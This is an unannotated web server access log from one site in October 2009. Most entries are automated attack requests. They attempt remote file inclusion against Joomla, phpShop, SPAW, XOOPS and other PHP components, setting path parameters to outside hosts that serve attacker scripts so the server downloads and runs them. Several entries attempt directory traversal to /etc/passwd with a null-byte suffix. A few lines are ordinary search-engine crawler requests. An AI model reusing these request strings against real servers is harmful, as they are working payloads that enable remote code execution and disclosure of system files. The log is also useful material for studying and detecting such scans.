72.11.145.8 - - [25/Oct/2009:18:18:48 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:18:48 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:19:01 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:19:01 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:19:01 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:19:01 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
65.55.207.95 - - [25/Oct/2009:18:19:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:19:13 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
65.55.51.112 - - [25/Oct/2009:18:19:59 -0700] "GET /logs/access_080804.log HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:21:06 -0700] "GET //?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:21:06 -0700] "GET //?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
218.238.2.226 - - [25/Oct/2009:18:21:44 -0700] "GET /logs/access_090713.log%20%20//?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.238.2.226 - - [25/Oct/2009:18:21:44 -0700] "GET /logs/access_090601.log%20%20//?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.238.2.226 - - [25/Oct/2009:18:21:44 -0700] "GET /?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.238.2.226 - - [25/Oct/2009:18:21:44 -0700] "GET /logs//?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:22:22 -0700] "GET /logs/access_090803.log///?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:22:23 -0700] "GET //?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:22:23 -0700] "GET /logs///?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 4948 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:22:30 -0700] "GET /logs/access_090803.log///?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:22:30 -0700] "GET //?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:22:30 -0700] "GET /logs///?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 4948 "-" "libwww-perl/5.831" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:22:40 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:23:47 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:23:47 -0700] "GET /logs/access_090316.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:23:47 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:10 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:10 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:10 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:34 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:34 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:34 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:47 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:47 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:24:47 -0700] "GET /logs/access.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.207.95 - - [25/Oct/2009:18:25:04 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:25:45 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:25:45 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:25:45 -0700] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:25:57 -0700] "GET /logs/access_090803.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.69.218.112 - - [25/Oct/2009:18:26:55 -0700] "GET /logs/access_090921.log/SSI.php?sourcedir=http://datingpop.com/uploades/banners/rm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.galf.org"
212.69.218.112 - - [25/Oct/2009:18:26:55 -0700] "GET /SSI.php?sourcedir=http://datingpop.com/uploades/banners/rm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.galf.org"
212.69.218.112 - - [25/Oct/2009:18:26:55 -0700] "GET /logs/SSI.php?sourcedir=http://datingpop.com/uploades/banners/rm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.galf.org"
212.69.218.112 - - [25/Oct/2009:18:27:41 -0700] "GET /logs/access_090518.log/SSI.php?sourcedir=http://datingpop.com/uploades/banners/rm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:27:46 -0700] "GET /logs/access_090309.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:28:39 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:28:39 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:28:39 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:28:39 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
212.69.218.112 - - [25/Oct/2009:18:29:23 -0700] "GET /logs/access_090921.log/?sourcedir=http://datingpop.com/uploades/banners/rm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.galf.org"
212.69.218.112 - - [25/Oct/2009:18:29:23 -0700] "GET /?sourcedir=http://datingpop.com/uploades/banners/rm.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.73" "www.galf.org"
212.69.218.112 - - [25/Oct/2009:18:29:23 -0700] "GET /logs/?sourcedir=http://datingpop.com/uploades/banners/rm.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.73" "www.galf.org"
212.69.218.112 - - [25/Oct/2009:18:30:09 -0700] "GET /logs/access_090518.log/?sourcedir=http://datingpop.com/uploades/banners/rm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.galf.org"
200.158.62.86 - - [25/Oct/2009:18:31:00 -0700] "GET /logs/access.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.158.62.86 - - [25/Oct/2009:18:31:00 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.158.62.86 - - [25/Oct/2009:18:31:01 -0700] "GET /logs/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.158.62.86 - - [25/Oct/2009:18:31:04 -0700] "GET /logs/access.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.158.62.86 - - [25/Oct/2009:18:31:05 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.158.62.86 - - [25/Oct/2009:18:31:05 -0700] "GET /logs/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
71.6.151.148 - - [25/Oct/2009:18:31:09 -0700] "GET /include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:31:09 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:31:09 -0700] "GET /logs/access_090511.log%20%20//include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:31:13 -0700] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:31:13 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:31:13 -0700] "GET /include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.123.88 - - [25/Oct/2009:18:31:46 -0700] "GET /logs/access_090413.log//?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.123.88 - - [25/Oct/2009:18:31:46 -0700] "GET /logs/access_090316.log//?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:31:57 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:31:57 -0700] "GET /include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:32:42 -0700] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.195.115.47 - - [25/Oct/2009:18:33:16 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:18:33:38 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
88.131.106.16 - - [25/Oct/2009:18:34:38 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [25/Oct/2009:18:34:53 -0700] "GET / HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:35:09 -0700] "GET /logs/access_090309.log/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:35:09 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:35:39 -0700] "GET /logs/access_090914.log/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:38:49 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:38:49 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:38:49 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:38:49 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
58.230.123.88 - - [25/Oct/2009:18:39:11 -0700] "GET /logs/access_090309.log/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.123.88 - - [25/Oct/2009:18:39:11 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.123.88 - - [25/Oct/2009:18:41:12 -0700] "GET /logs/access_090309.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.123.88 - - [25/Oct/2009:18:41:57 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.123.88 - - [25/Oct/2009:18:41:57 -0700] "GET /logs/access.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.233.89.140 - - [25/Oct/2009:18:41:57 -0700] "GET /logs/access_090413.log//?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:18:41:57 -0700] "GET /?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:18:41:57 -0700] "GET /logs//?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:18:42:02 -0700] "GET /logs/access_090316.log//?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.98 - - [25/Oct/2009:18:44:37 -0700] "GET /logs/ HTTP/1.1" 200 4942 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:18:45:41 -0700] "GET /?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:18:45:41 -0700] "GET /logs//?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:18:45:41 -0700] "GET /logs/access_090316.log%20%20//?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:18:45:48 -0700] "GET /?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
211.233.89.140 - - [25/Oct/2009:18:45:48 -0700] "GET /logs//?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
211.233.89.140 - - [25/Oct/2009:18:45:48 -0700] "GET /logs/access.log%20%20//?index.php?mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [25/Oct/2009:18:46:49 -0700] "GET /index.php?basePath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:46:49 -0700] "GET /logs//index.php?basePath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:48:38 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:48:38 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:48:39 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:48:39 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
198.106.204.159 - - [25/Oct/2009:18:49:28 -0700] "GET /components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [25/Oct/2009:18:49:28 -0700] "GET /components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
125.251.147.194 - - [25/Oct/2009:18:52:31 -0700] "GET /logs/access_090316.log%20%20/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.147.194 - - [25/Oct/2009:18:52:31 -0700] "GET /index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.147.194 - - [25/Oct/2009:18:52:31 -0700] "GET /logs/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.147.194 - - [25/Oct/2009:18:52:36 -0700] "GET /logs/access_090629.log%20%20/index.php?pageurl=http://www.museum-mputantular.com//AhoK/ip.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.221.148.147 - - [25/Oct/2009:18:55:00 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.221.148.147 - - [25/Oct/2009:18:55:00 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.221.148.147 - - [25/Oct/2009:18:55:00 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.131.59 - - [25/Oct/2009:18:55:00 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
77.222.131.59 - - [25/Oct/2009:18:55:00 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
77.222.131.59 - - [25/Oct/2009:18:55:01 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
211.223.201.177 - - [25/Oct/2009:18:55:30 -0700] "GET /logs/access_090518.log%20%20/include/bbs.lib.inc.php?site_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
